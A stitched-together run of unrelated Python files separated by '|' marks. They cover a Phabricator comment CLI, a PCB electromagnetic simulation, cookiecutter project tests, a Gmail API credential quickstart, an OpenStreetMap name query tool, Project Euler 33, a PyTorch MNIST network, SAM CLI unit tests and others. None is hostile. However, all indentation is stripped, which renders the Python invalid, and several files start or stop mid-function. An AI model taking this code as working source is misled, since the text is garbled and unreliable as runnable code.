add_extra_def('potential',args,defs_lines,extra_defs)
add_extra_def('ctu',args,defs_lines,extra_defs)
add_extra_def('prof',args,defs_lines,extra_defs)
add_extra_def('silent',args,defs_lines,extra_defs)
add_extra_def('float',args,defs_lines,extra_defs,defname='ISFLOAT')
add_extra_def('de',args,defs_lines,extra_defs,defname='DUAL_ENERGY')
if args['de']:
extra_defs.append("#define DETOL {:.3e}".format(args['detol']))
# Write outputs
shutil.copy(defsfile,'src/prob.h')
shutil.copy(initfile,'src/prob.cu')
lines = load_par_file(parfile)
create_par_file(lines,'src/read_pars.c')
struct_lines = create_struct(lines)
with open('src/prob.h','w') as f:
f.write('\n'.join(defs_lines + extra_defs) + '\n\n')
f.write('\n'.join(struct_lines) + '\n')
call(['tar','-czf','{}_src.tar.gz'.format(problem_name),'src/'])
|
"""create a comment on differential reviews.
usage examples:
comment on revision '1':
$ arcyon comment 1 -m 'hello revision 1, how are you?'
accept revision '1':
$ arcyon comment 1 -m 'looks good' --action accept
comment on revisions 1 and 2, reading the message from 'mymessage':
$ arcyon comment 1 2 --message-file mymessage
"""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# aoncmd_comment
#
# Public Functions:
# getFromfilePrefixChars
# setupParser
# process
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import textwrap
import phlcon_differential
import phlsys_makeconduit
def getFromfilePrefixChars():
return ""
def setupParser(parser):
actions = parser.add_argument_group(
'action arguments',
'use any of ' + textwrap.fill(
str(phlcon_differential.USER_ACTIONS.keys())))
parser.add_argument(
'ids',
type=int,
nargs="*",
default=[],
help="the revisions to comment on (e.g. 1)")
parser.add_argument(
'--ids-file',
metavar='FILE',
type=argparse.FileType('r'),
help="a file to read ids from, use '-' to specify stdin")
parser.add_argument(
'--message', '-m',
metavar="M",
default="",
type=str,
help="the body text of the comment")
parser.add_argument(
'--message-file',
metavar='FILE',
type=argparse.FileType('r'),
help="a file to read the message from, use '-' for stdin")
parser.add_argument(
'--silent',
action='store_true',
help="don't send notification emails for this comment")
parser.add_argument(
'--attach-inlines',
action='store_true',
help="attach pending inline comments")
actions.add_argument(
'--action', '-a',
choices=phlcon_differential.USER_ACTIONS.keys(),
metavar="ACTION",
default='comment',
type=str,
help="perform an action on a review")
phlsys_makeconduit.add_argparse_arguments(parser)
def process(args):
conduit = phlsys_makeconduit.make_conduit(
args.uri, args.user, args.cert, args.act_as_user)
d = {
'message': args.message,
'silent': args.silent,
'action': phlcon_differential.USER_ACTIONS[args.action],
'attach_inlines': args.attach_inlines
}
if args.message_file:
d['message'] += args.message_file.read()
ids = args.ids
if args.ids_file:
ids.extend([int(i) for i in args.ids_file.read().split()])
if not ids:
print("error: you have not specified any revision ids")
sys.exit(1)
for i in ids:
phlcon_differential.create_comment(conduit, i, **d)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
def section1():
"""
# Upload & Manage Data & Metadata
## Upload specific files
When you have specific files you want to upload, you can upload them all into a dataset using this script:
"""
def section2():
"""
## Upload all files in a folder
If you want to upload all files from a folder, you can do that by just specifying the folder name:
"""
def section3():
"""
## Upload items from URL link
You can provide Dataloop with the link to the item, and not necessarily the item itself.
"""
def section4():
"""
You can open an item uploaded to Dataloop by opening it in a viewer.
"""
def section5():
"""
### Additional upload options
Additional upload options include using buffer, pillow, openCV, and NdArray - see our complete documentation for code examples.
## Upload Items and Annotations Metadata
You can upload items as a table using a pandas data frame that will let you upload items with info (annotations, metadata such as confidence, filename, etc.) attached to it.
"""
|
#First Way !!
#import myfunc
#myfunc.hello()
# Second way
from myfunc import hello
hello
# third way - import dir into path
#/Users/mohalloran/Documents/Python_For_NetENG_with_KirkB/PROGRAMS/week2/test
|
#!/usr/bin/env python
from typing import List
import numpy as np
from pyems.pcb import common_pcbs
from pyems.simulation import Simulation
from pyems.utilities import print_table
from pyems.structure import (
PCB,
Microstrip,
common_smd_passives,
SMDPassive,
)
from pyems.coordinate import Box2, Coordinate2, Axis
from pyems.mesh import Mesh
from pyems.calc import minimize
unit = 1e-3
freq = np.arange(1e9, 18e9, 1e7)
pcb_prop = common_pcbs["oshpark4"]
pcb_len = 10
pcb_width = 5
trace_width = 0.38
z0_ref = 50
cap_dim = common_smd_passives["0402C"]
# cap_dim = common_smd_passives["0201C"]
cap_dim.set_unit(unit)
pad_length = cap_dim.width
pad_width = cap_dim.width
def func(params: List[float]):
"""
"""
cutout_width = params[0]
sim = Simulation(freq=freq, unit=unit, sim_dir=None)
pcb = PCB(
sim=sim,
pcb_prop=pcb_prop,
length=pcb_len,
width=pcb_width,
layers=range(3),
omit_copper=[0],
)
box = Box2(
Coordinate2(-pcb_len / 2, -trace_width / 2),
Coordinate2(-(cap_dim.length / 2) - (pad_length / 2), trace_width / 2),
)
Microstrip(
pcb=pcb,
position=box.center(),
length=box.length(),
width=box.width(),
propagation_axis=Axis("x"),
trace_layer=0,
gnd_layer=1,
port_number=1,
excite=True,
feed_shift=0.35,
ref_impedance=z0_ref,
)
SMDPassive(
pcb=pcb,
position=Coordinate2(0, 0),
axis=Axis("x"),
dimensions=cap_dim,
pad_width=pad_width,
pad_length=pad_length,
c=10e-12,
pcb_layer=0,
gnd_cutout_width=cutout_width,
gnd_cutout_length=1,
)
box = Box2(
Coordinate2(pcb_len / 2, trace_width / 2),
Coordinate2((cap_dim.length / 2) + (pad_length / 2), -trace_width / 2),
)
Microstrip(
pcb=pcb,
position=box.center(),
length=box.length(),
width=box.width(),
propagation_axis=Axis("x", direction=-1),
trace_layer=0,
gnd_layer=1,
port_number=2,
excite=False,
ref_impedance=z0_ref,
)
Mesh(
sim=sim,
metal_res=1 / 120,
nonmetal_res=1 / 40,
smooth=(1.2, 1.2, 1.2),
min_lines=5,
expand_bounds=((0, 0), (0, 0), (10, 20)),
)
sim.run(csx=False)
print_table(
data=[sim.freq / 1e9, sim.s_param(1, 1), sim.s_param(2, 1)],
col_names=["freq", "s11", "s21"],
prec=[4, 4, 4],
)
return np.sum(sim.s_param(1, 1))
res = minimize(func=func, initial=[1.2], tol=1e-2, bounds=[(0, None)])
print(res)
|
import os
from pathlib import Path
from subprocess import run, PIPE
import pytest
from conftest import bake_project, config_generator
def no_curlies(filepath):
""" Utility to make sure no curly braces appear in a file.
That is, was jinja able to render everthing?
"""
data = filepath.open('r').read()
template_strings = [
'{{',
'}}',
'{%',
'%}'
]
template_strings_in_file = [s in data for s in template_strings]
return not any(template_strings_in_file)
@pytest.mark.parametrize("config", config_generator())
def test_baking_configs(config):
""" For every generated config in the config_generator, run all
of the tests.
"""
print("using config", config)
with bake_project(config) as project_directory:
verify_folders(project_directory, config)
verify_files(project_directory, config)
verify_makefile_commands(project_directory, config)
def verify_folders(root, config):
''' Tests that expected folders and only expected folders exist.
'''
expected_dirs = [
'.',
'data',
'data/external',
'data/interim',
'data/processed',
'data/raw',
'docs',
'models',
'notebooks',
'references',
'reports',
'reports/figures',
config['module_name'],
f"{config['module_name']}/data",
f"{config['module_name']}/features",
f"{config['module_name']}/models",
f"{config['module_name']}/visualization",
]
expected_dirs = [
# (root / d).resolve().relative_to(root) for d in expected_dirs
Path(d) for d in expected_dirs
]
existing_dirs = [
d.resolve().relative_to(root) for d in root.glob('**') if d.is_dir()
]
assert sorted(existing_dirs) == sorted(expected_dirs)
def verify_files(root, config):
''' Test that expected files and only expected files exist.
'''
expected_files = [
'Makefile',
'README.md',
'setup.py',
".env",
".gitignore",
"data/external/.gitkeep",
"data/interim/.gitkeep",
"data/processed/.gitkeep",
"data/raw/.gitkeep",
"docs/Makefile",
"docs/commands.rst",
"docs/conf.py",
"docs/getting-started.rst",
"docs/index.rst",
"docs/make.bat",
"notebooks/.gitkeep",
"references/.gitkeep",
"reports/.gitkeep",
"reports/figures/.gitkeep",
"models/.gitkeep",
f"{config['module_name']}/__init__.py",
f"{config['module_name']}/data/__init__.py",
f"{config['module_name']}/data/make_dataset.py",
f"{config['module_name']}/features/__init__.py",
f"{config['module_name']}/features/build_features.py",
f"{config['module_name']}/models/__init__.py",
f"{config['module_name']}/models/train_model.py",
f"{config['module_name']}/models/predict_model.py",
f"{config['module_name']}/visualization/__init__.py",
f"{config['module_name']}/visualization/visualize.py",
]
# conditional files
if not config["open_source_license"].startswith("No license"):
expected_files.append('LICENSE')
expected_files.append(config["dependency_file"])
expected_files = [
Path(f) for f in expected_files
]
existing_files = [
f.relative_to(root) for f in root.glob('**/*') if f.is_file()
]
assert sorted(existing_files) == sorted(expected_files)
for f in existing_files:
assert no_curlies(root / f)
def verify_makefile_commands(root, config):
""" Actually shell out to bash and run the make commands for:
- create_environment
- requirements
Ensure that these use the proper environment.
"""
test_path = Path(__file__).parent
if config["environment_manager"] == 'conda':
harness_path = test_path / "conda_harness.sh"
elif config["environment_manager"] == 'virtualenv':
harness_path = test_path / "virtualenv_harness.sh"
elif config["environment_manager"] == 'pipenv':
harness_path = test_path / "pipenv_harness.sh"
elif config["environment_manager"] == 'none':
return True
else:
raise ValueError(f"Environment manager '{config['environment_manager']}' not found in test harnesses.")
result = run(["bash", str(harness_path), str(root.resolve())], stderr=PIPE, stdout=PIPE)
# normally hidden by pytest except in failure we want this displayed
print("\n======================= STDOUT ======================")
print(result.stdout.decode())
print("\n======================= STDERR ======================")
print(result.stderr.decode())
assert result.returncode == 0
|
"""
Original: Shelley Pham
New Author: Shubham Naik
"""
from __future__ import print_function
import httplib2
import os
import re
import time
import base64
from apiclient import discovery
from apiclient import errors
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
SCOPES = 'https://mail.google.com/'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
def get_credentials():
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'gmail-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def main():
credentials = get_credentials()
if __name__ == '__main__':
main()
|
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import logging
import textwrap
from os_cloud_management.cmd.utils import _clients as clients
from os_cloud_management.cmd.utils import environment
from os_cloud_management import updates
def parse_args():
description = textwrap.dedent("""
Run stack update.
""")
parser = argparse.ArgumentParser(
description=description,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-s', '--stack', dest='orig_stack',
help='Name or ID of a stack to update')
parser.add_argument('-c', '--continue', dest='update_stack',
help='Name or ID of a stack representing an '
'existing update')
parser.add_argument('-t', '--template', dest='template',
help='A template containing UpdateConfig to be '
'used for update')
parser.add_argument('-n', '--name', dest='update_name',
help='Name for the update stack')
parser.add_argument('-i', '--interactive', dest='interactive',
action='store_true',
help='Run update process in interactive mode')
environment._add_logging_arguments(parser)
return parser.parse_args()
def main():
args = parse_args()
environment._configure_logging(args)
try:
environment._ensure()
client = clients.get_heat_client()
if args.orig_stack:
update = updates.UpdateManager(client=client)
update.start(args.orig_stack, args.template, args.update_name)
elif args.update_stack:
update = updates.UpdateManager(client=client,
stack_id=args.update_stack)
if args.interactive:
update.do_interactive_update()
else:
print("status: {0} ({1})".format(update.get_status()))
except Exception:
logging.exception("Unexpected error during command execution")
return 1
return 0
|
from OSMPythonTools.overpass import Overpass, overpassQueryBuilder
from OSMPythonTools.nominatim import Nominatim
import argparse
import pprint
import sys
highway_roads = ['motorway', 'trunk', 'primary', 'secondary', 'tertiary', 'unclassified', 'residential']
highway_link_roads = ['motorway_link', 'trunk_link', 'primary_link', 'secondary_link', 'tertiary_link']
highway_special = ['living_street', 'service', 'pedestrian', 'track', 'bus_guideway', 'escape', 'raceway', 'road', 'busway']
highway_paths = ['footway', 'bridleway', 'steps', 'corridor', 'path']
verbose_output = False
def searchStreets(searchArea, granularity):
if verbose_output:
print(f"Searching for streets in {searchArea.displayName()} with granularity {granularity}")
highway_selectors = []
if granularity <= 1:
highway_selectors += highway_roads[:2]
elif granularity == 2:
highway_selectors += highway_roads[:3]
elif granularity == 3:
highway_selectors += highway_roads[:3]
highway_selectors += highway_link_roads[:3]
elif granularity == 4:
highway_selectors += highway_roads[:5]
highway_selectors += highway_link_roads
elif granularity == 5:
highway_selectors += highway_roads
highway_selectors += highway_link_roads
elif granularity == 6:
highway_selectors += highway_roads
highway_selectors += highway_link_roads
highway_selectors += highway_special
elif granularity == 7:
highway_selectors += highway_roads
highway_selectors += highway_link_roads
highway_selectors += highway_special
highway_selectors += highway_paths
elif granularity >= 8:
load_all = True
selector_criteria = ['name']
if load_all:
selector_criteria.append('highway')
else:
highway_regex='|'.join(highway_selectors)
selector_criteria.append(f'"highway"~"{highway_regex}"')
query = overpassQueryBuilder(area=searchArea, elementType='way',selector=selector_criteria, out='body')
overpass = Overpass()
streets = overpass.query(query)
street_names = set()
for street in streets._elements:
street_names.add(street.tags()['name'])
if verbose_output:
print(f"Found {len(street_names)} unique street names")
return street_names
def searchForKey(searchArea, key):
if verbose_output:
print(f"Searching for {key} in {searchArea.displayName()}")
selector_criteria = ['name', key]
query = overpassQueryBuilder(area=searchArea, elementType='node',selector=selector_criteria, out='body')
overpass = Overpass()
result = overpass.query(query)
entries = set()
for result_entry in result._elements:
entries.add(result_entry.tags()['name'])
if verbose_output:
print(f"Found {len(entries)} unique entries")
return entries
def writeToOutput(output, result):
for line in result:
output.write("%s\n" % line)
def main(args):
nominatim = Nominatim()
searchArea = nominatim.query(args.query)
if verbose_output:
print(searchArea.displayName())
output = args.o
result = set()
if args.c:
writeToOutput(output, searchStreets(searchArea, 8))
if args.r:
writeToOutput(output, searchStreets(searchArea, args.s))
if args.a or args.c:
writeToOutput(output, searchForKey(searchArea, 'shop'))
writeToOutput(output, searchForKey(searchArea, 'amenity'))
writeToOutput(output, searchForKey(searchArea, 'leisure'))
writeToOutput(output, searchForKey(searchArea, 'sport'))
if args.b or args.c:
writeToOutput(output, searchForKey(searchArea, 'barrier'))
writeToOutput(output, searchForKey(searchArea, 'boundary'))
if args.m or args.c:
writeToOutput(output, searchForKey(searchArea, 'man_made'))
writeToOutput(output, searchForKey(searchArea, 'building'))
if args.i or args.c:
writeToOutput(output, searchForKey(searchArea, 'craft'))
writeToOutput(output, searchForKey(searchArea, 'office'))
if args.e or args.c:
writeToOutput(output, searchForKey(searchArea, 'emergency'))
writeToOutput(output, searchForKey(searchArea, 'power'))
writeToOutput(output, searchForKey(searchArea, 'public_transport'))
writeToOutput(output, searchForKey(searchArea, 'railway'))
writeToOutput(output, searchForKey(searchArea, 'telecom'))
if args.n or args.c:
writeToOutput(output, searchForKey(searchArea, 'geological'))
writeToOutput(output, searchForKey(searchArea, 'natural'))
if args.p or args.c:
writeToOutput(output, searchForKey(searchArea, 'historic'))
writeToOutput(output, searchForKey(searchArea, 'place'))
if args.w or args.c:
writeToOutput(output, searchForKey(searchArea, 'water'))
writeToOutput(output, searchForKey(searchArea, 'waterway'))
if verbose_output:
print(f'Found a total of {len(result)} unique entries')
if __name__ == "__main__":
parser = argparse.ArgumentParser("Query geo data")
parser.add_argument('-r', type=int, help='Query roads names and set a granularity between 1-8')
parser.add_argument('-b', action='store_true', help='Query barriers and boundaries')
parser.add_argument('-p', action='store_true', help='Query historic and place')
parser.add_argument('-i', action='store_true', help='Query craft and office')
parser.add_argument('-e', action='store_true', help='Query infrastructure')
parser.add_argument('-a', action='store_true', help='Query shops, leisure, sport and amenities')
parser.add_argument('-m', action='store_true', help='Query man_made and buildings')
parser.add_argument('-n', action='store_true', help='Query natural and geological')
parser.add_argument('-w', action='store_true', help='Query water and waterways')
parser.add_argument('-c', action='store_true', help='Query everything')
parser.add_argument('-v', action='store_true', help='Verbose output, polutes stdout')
parser.add_argument('-o', type=argparse.FileType('w',encoding="utf-8"), default=sys.stdout, help='Output file')
parser.add_argument('query', nargs=1, help='Query to determine the location')
args = parser.parse_args()
verbose_output = args.v
main(args)
|
# coding=utf-8
"""
Project Euler Problem 33
Digit cancelling fractions
Solved by Ahrar Monsur
The fraction 49/98 is a curious fraction, as an inexperienced mathematician in attempting to simplify it may incorrectly believe that 49/98 = 4/8, which is correct, is obtained by cancelling the 9s.
We shall consider fractions like, 30/50 = 3/5, to be trivial examples.
There are exactly four non-trivial examples of this type of fraction, less than one in value, and containing two digits in the numerator and denominator.
If the product of these four fractions is given in its lowest common terms, find the value of the denominator.
"""
from __future__ import division
from functools import reduce
def get_common_digits(numerator, denominator):
num_str = str(numerator)
den_str = str(denominator)
common_digits = set(num_str).intersection(den_str)
return common_digits
def get_naive_fraction(numerator, denominator):
common_digits = get_common_digits(numerator, denominator)
naive_num, naive_den = map(lambda x: [y for y in str(x)], [numerator, denominator])
for digit in common_digits:
naive_num.remove(digit)
naive_den.remove(digit)
naive_num = int(''.join(naive_num)) if naive_num else 0
naive_den = int(''.join(naive_den)) if naive_den else 0
return naive_num, naive_den
def main():
candidates = []
den_range = xrange(10, 100)
for den in den_range:
num_range = xrange(10, den)
for num in num_range:
common_digits = get_common_digits(num, den)
if common_digits not in [set('0'), set()]:
naive_num, naive_den = get_naive_fraction(num, den)
if (naive_num
and naive_den
and num/den == naive_num/naive_den
):
candidates.append((num, den))
# gather all candidate numerators and denominators
candidate_groups = zip(*candidates)
num_prod = reduce(lambda x, y: x*y, candidate_groups[0])
den_prod = reduce(lambda x, y: x*y, candidate_groups[1])
print "Candidates: {}".format(candidates)
print "Product of candidates: {}/{}".format(num_prod, den_prod)
main()
|
import numpy as np
from skimage.color import gray2rgb
from skimage.draw import (
circle,
circle_perimeter,
circle_perimeter_aa
)
from skimage.morphology import (
dilation,
disk
)
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class Arena(QObject):
"""Base class for arena objects.
Contains simple function to generate a background image for
a video.
Parameters
----------
video : motmot.FlyMovieFormat.FlyMovie object
Video to calculate a background image from.
Attributes
----------
height : int
Video height in pixels.
width : int
Video width in pixels.
n_frames : int
Total number of frames contained within video.
background_image : None or np.ndarray of shape [height, width] (default = None)
Background image calculated as mean of a specified number of frames
take from the video.
arena_size : int
Size of arena in mm.
pixels_to_mm : int
Number of pixels in 1 mm of arena.
Signals
-------
background_frame_ix : int
Contains processing information to keep track of which frame is being
added to the background image.
"""
background_frame_ix = pyqtSignal(int)
def __init__(self, video, parent = None):
super(Arena, self).__init__(parent)
self.video = video
self.height = video.get_height()
self.width = video.get_width()
self.n_frames = video.get_n_frames()
self.arena_size = None
self.pixels_to_mm = None
self.background_image = None
def calculate_background(self, n_background_images = 200):
"""Calculates a background image for a video.
Parameters
----------
n_background_images : int (default = 200)
Number of image to use for calculting background.
"""
background_image = np.zeros(
shape=(self.height, self.width), dtype=np.float)
if n_background_images > self.n_frames:
raise AttributeError("number of images to use for background " +
"calculation should be less than the total number of images " +
"present in the video associated with this arena.")
frame_ix = np.random.randint(0, self.n_frames, n_background_images)
for i, ix in enumerate(frame_ix):
# need to cast to long to avoid overflow errors.
ix = long(ix)
# debugging output;
# print '\nchunk_start: {}'.format(self.video.chunk_start)
# print 'bytes_per_chunk: {}'.format(self.video.bytes_per_chunk)
# print 'ix: {}'.format(ix)
# print self.video.chunk_start+self.video.bytes_per_chunk*ix
current_img = self.video.get_frame(ix)[0]
background_image = background_image + current_img
self.background_frame_ix.emit(i)
background_image = background_image / frame_ix.size
self.background_image = background_image.astype(np.uint8)
class CircularArena(Arena):
"""Circular Arena object.
Attributes
----------
center : tuple of length 2
Center of circle that encloses arena as (rr, cc).
radius : int
Radius of circle that encloses arena.
"""
def __init__(self, video, parent=None):
super(CircularArena, self).__init__(video, parent)
self.center = None
self.radius = None
def get_arena_mask(self):
"""Returns the mask of the arena based."""
coords = self.get_arena_coordinates()
mask = np.zeros_like(self.background_image)
mask[coords] = 1
return mask
def get_arena_coordinates(self):
"""Returns image coordinates contained within CircularArena.
Returns
-------
rr : np.ndarray | shape = [N]
Rows containing circle coodinates.
cc : np.ndarray | shape = [N]
Columns containing circle coordinates.
"""
return circle(self.center[0], self.center[1], self.radius,
shape = self.background_image.shape)
def settings_valid(self):
"""Checks to see that all necessary settings have been set."""
if self.center is not None and \
self.radius is not None and \
self.background_image is not None and \
self.arena_size is not None and \
self.pixels_to_mm is not None:
return True
return False
def draw_arena(self, color=(255, 0, 0), thickness=2):
"""Draws perimeter of circular arena.
Parameters
----------
color : tuple of length 3 (default = (255, 0, 0))
Color of outline of arena (R, G, B).
thickness : int
How thick should the line used to define the edge of the
arena be?
Returns
-------
arena_image : np.ndarray | shape = [height, width, 3]
Three-dimensional (color) image of arena.
"""
# make a copy of the background image so that the actual
# background image is not affected.
arena_image = self.background_image.copy()
# using skimage
# =============
arena_image = gray2rgb(arena_image)
assert arena_image.dtype == np.uint8, "image not of type uint8"
# get the coordinates defining the perimeter of this arena.
rr, cc = circle_perimeter(
self.center[0],
self.center[1],
self.radius,
shape=self.background_image.shape
)
# expand the line width of the above circle coordinates.
perimeter_mask = np.zeros_like(self.background_image)
perimeter_mask[rr, cc] = 1
dilated_perimeter_mask = dilation(
perimeter_mask,
disk(thickness)
)
rr, cc = np.where(dilated_perimeter_mask)
arena_image[rr, cc, :] = color
return arena_image
|
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def predict(model, device, test_loader):
model.eval()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
pred = output.argmax(dim=1, keepdim=True)
|
from datetime import date
from django.db.models import Prefetch
from wagtail.core import blocks
from regulations3k.models.django import EffectiveVersion
from v1.atomic_elements import organisms
class RegulationsList(organisms.ModelBlock):
model = "regulations3k.RegulationPage"
ordering = "title"
heading = blocks.CharBlock(
required=False, help_text="Regulations list heading"
)
more_regs_page = blocks.PageChooserBlock(
help_text="Link to more regulations"
)
more_regs_text = blocks.CharBlock(
required=False, help_text="Text to show on link to more regulations"
)
def filter_queryset(self, qs, value):
return qs.live()
def get_queryset(self, value):
qs = super().get_queryset(value)
future_versions_qs = EffectiveVersion.objects.filter(
draft=False, effective_date__gte=date.today()
)
qs = qs.prefetch_related(
Prefetch(
"regulation__versions",
queryset=future_versions_qs,
to_attr="future_versions",
)
)
return qs
def get_context(self, value, parent_context=None):
context = super().get_context(value, parent_context=parent_context)
context["regulations"] = self.get_queryset(value)
return context
class Meta:
icon = "list-ul"
template = "regulations3k/regulations-listing.html"
class RegulationsListingFullWidthText(organisms.FullWidthText):
regulations_list = RegulationsList()
|
#
# Copyright(c) 2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
from threading import Lock
from .volume import Volume, VOLUME_POISON
from .io import Io, IoDir
from ctypes import cast, c_void_p, CFUNCTYPE, c_int, POINTER, memmove, sizeof, pointer
class ReplicatedVolume(Volume):
def __init__(self, primary: Volume, secondary: Volume, uuid=None):
super().__init__(uuid)
self.primary = primary
self.secondary = secondary
if secondary.get_max_io_size() < primary.get_max_io_size():
raise Exception("secondary volume max io size too small")
if secondary.get_length() < primary.get_length():
raise Exception("secondary volume size too small")
def do_open(self):
ret = self.primary.do_open()
if ret:
return ret
ret = self.secondary.do_open()
if ret:
self.primary.close()
return ret
def close(self):
self.primary.close()
self.secondary.close()
def get_length(self):
return self.primary.get_length()
def get_max_io_size(self):
return self.primary.get_max_io_size()
def _prepare_io(self, io):
original_cb = Io.END()
pointer(original_cb)[0] = io.contents._end
lock = Lock()
error = 0
io_remaining = 2
@CFUNCTYPE(None, c_void_p, c_int)
def cb(io, err):
nonlocal io_remaining
nonlocal error
nonlocal original_cb
nonlocal lock
io = cast(io, POINTER(Io))
with lock:
if err:
error = err
io_remaining -= 1
finished = True if io_remaining == 0 else False
if finished:
io.contents._end = original_cb
original_cb(io, error)
io.contents._end = cb
def do_submit_io(self, io):
if io.contents._dir == IoDir.WRITE:
self._prepare_io(io)
self.primary.submit_io(io)
self.secondary.submit_io(io)
else:
# for read just pass through down to primary
# with original completion
self.primary.submit_io(io)
def do_submit_flush(self, flush):
self._prepare_io(flush)
self.primary.submit_flush(flush)
self.secondary.submit_flush(flush)
def do_submit_discard(self, discard):
self._prepare_io(discard)
self.primary.submit_discard(discard)
self.secondary.submit_discard(discard)
def dump(self, offset=0, size=0, ignore=VOLUME_POISON, **kwargs):
self.primary.dump()
def md5(self):
return self.primary.md5()
|
# For balanced binary tree, will be O(n*log(n)) because
# max path depth is O(log(n)) due to height of tree.
class TreeNode:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
def dfs(self, goal, all_paths, curr_path=None):
if curr_path is None:
curr_path = []
curr_path.append(self.val)
curr_val = goal - self.val
if curr_val == 0:
all_paths.append(list(curr_path))
if self.left is not None:
self.left.dfs(goal=curr_val, all_paths=all_paths, curr_path=curr_path)
if self.right is not None:
self.right.dfs(goal=curr_val, all_paths=all_paths, curr_path=curr_path)
# Remove node from stack as backtrack
curr_path.pop()
return all_paths
def find_paths(root, total):
return root.dfs(goal=total, all_paths=[])
def main():
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(4)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
sum = 23
print("Tree paths with sum " + str(sum) +
": " + str(find_paths(root, sum)))
main()
|
"""
Unit test for Utils
"""
import os
from unittest import TestCase
from unittest.mock import patch, Mock
from samcli.local.docker.utils import to_posix_path, find_free_port
from samcli.local.docker.exceptions import NoFreePortsError
class TestPosixPath(TestCase):
def setUp(self):
self.ntpath = "C:\\Users\\UserName\\AppData\\Local\\Temp\\temp1337"
self.posixpath = "/c/Users/UserName/AppData/Local/Temp/temp1337"
self.current_working_dir = os.getcwd()
@patch("samcli.local.docker.utils.os")
def test_convert_posix_path_if_windows_style_path(self, mock_os):
mock_os.name = "nt"
self.assertEqual(self.posixpath, to_posix_path(self.ntpath))
@patch("samcli.local.docker.utils.os")
def test_do_not_convert_posix_path(self, mock_os):
mock_os.name = "posix"
self.assertEqual(self.current_working_dir, to_posix_path(self.current_working_dir))
class TestFreePorts(TestCase):
@patch("samcli.local.docker.utils.socket")
@patch("samcli.local.docker.utils.random")
def test_free_port_first_attempt(self, mock_random, mock_socket):
mock_random.randrange = Mock(side_effect=[3093] * 1000)
port = find_free_port(start=3000, end=4000)
self.assertEqual(port, 3093)
@patch("samcli.local.docker.utils.socket")
@patch("samcli.local.docker.utils.random")
def test_free_port_after_failed_attempts(self, mock_random, mock_socket_module):
mock_socket_object = Mock()
mock_socket_object.bind = Mock(side_effect=[OSError, OSError, Mock()])
mock_socket_module.socket = Mock(return_value=mock_socket_object)
mock_random.randrange = Mock(side_effect=[3093, 3987, 3300, 3033] * 250)
port = find_free_port(start=3000, end=4000)
self.assertEqual(port, 3300)
@patch("samcli.local.docker.utils.socket")
@patch("samcli.local.docker.utils.random")
def test_no_free_port_after_failed_attempts(self, mock_random, mock_socket_module):
mock_socket_object = Mock()
mock_socket_object.bind = Mock(side_effect=[OSError, OSError, OSError])
mock_socket_module.socket = Mock(return_value=mock_socket_object)
mock_random.randrange = Mock(side_effect=[1, 2, 3] * 3)
with self.assertRaises(NoFreePortsError):
find_free_port(start=1, end=4)
|
import math
import json
import argparse
import sys
class Customer:
def __init__(self, user_id, name, latitude, longitude):
self.user_id = int(user_id)
self.name = name
self.latitude = float(latitude)
self.longitude = float(longitude)
def __repr__(self):
return '{} {}: {}'.format(
self.__class__.__name__,
self.user_id,
self.name
)
def __cmp__(self, other):
if hasattr(other, 'user_id'):
return self.user_id.__cmp__(other.user_id)
class Parser:
@staticmethod
def parse(filename):
"""open and parse a file, and return a list of Customers"""
customer_list = []
